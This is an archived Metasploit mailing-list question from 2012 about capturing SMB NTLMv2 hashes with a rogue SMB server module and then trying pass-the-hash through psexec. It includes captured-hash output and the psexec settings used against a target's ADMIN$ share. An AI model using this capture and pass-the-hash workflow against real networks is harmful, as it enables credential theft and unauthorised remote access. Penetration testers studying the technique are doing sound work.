Metasploit mailing list archives
metasploit auxiliary/server/capture/smb and pass the hash
From: macubergeek <macubergeek () comcast net>
Date: Thu, 5 Apr 2012 04:54:09 -0400
I've been working with the metasploit auxiliary/server/capture/smb module and have had good success capturing smb hashes. [*] Empty hash captured from 192.168.1.1:1981 captured, ignoring ... [*] 2012-03-30 22:57:24 -0400 NTLMv2 Response Captured from 192.168.1.1:1981 USER:DomainUser DOMAIN:MASSIVE OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 LMHASH:AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB LM_CLIENT_CHALLENGE:cf4000a12bdec1ad NTHASH:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD NT_CLIENT_CHALLENGE:0101000000000000f89c09009812cd01cf4000a12bdec1ad0000 0000020000000000000000000000 Chris Gates's Carnal Ownage blog suggests cracking the A's with John and guessing at the B's My questions are: does the "Empty hash captured" signify that the LM hash was disabled on this box? Passing the hash I've tried passing the hash using exploit/windows/smb/psexec configured like so Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.1 yes The target address RPORT 445 yes Set the SMB service port SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain MASSIVE no The Windows domain to use for authentication SMBPass AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD no The password for the specified username SMBUser DomainUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic This results in authentication/Login errors. I realize I can't pass the hash against DomainUser on his box while he's logged in but does anyone know if I can say use a domain admin cred against DomainUser's box? I've tried doing psexec against DomainUser's box after he logged out of the machine and still no go. I'm not sure if pass the hash works here or if I'm using the correct answer for SMBPass. Jim ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ %49%66%20%79%6F%75%20%63%61%6E%20%72%65%61%64%20%74%68%69%73%20%79%6F%75%20%6E%65%65%64%20%74%6F%20%67%65%74%20%61%20%67%69%72%6C%66%72%69%65%6E%64%2E
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- metasploit auxiliary/server/capture/smb and pass the hash macubergeek (Apr 05)
- Message not available
- Fwd: metasploit auxiliary/server/capture/smb and pass the hash Joshua Smith (Apr 05)
- Re: Fwd: metasploit auxiliary/server/capture/smb and pass the hash Kurt Grutzmacher (Apr 06)
- Fwd: metasploit auxiliary/server/capture/smb and pass the hash Joshua Smith (Apr 05)
- Message not available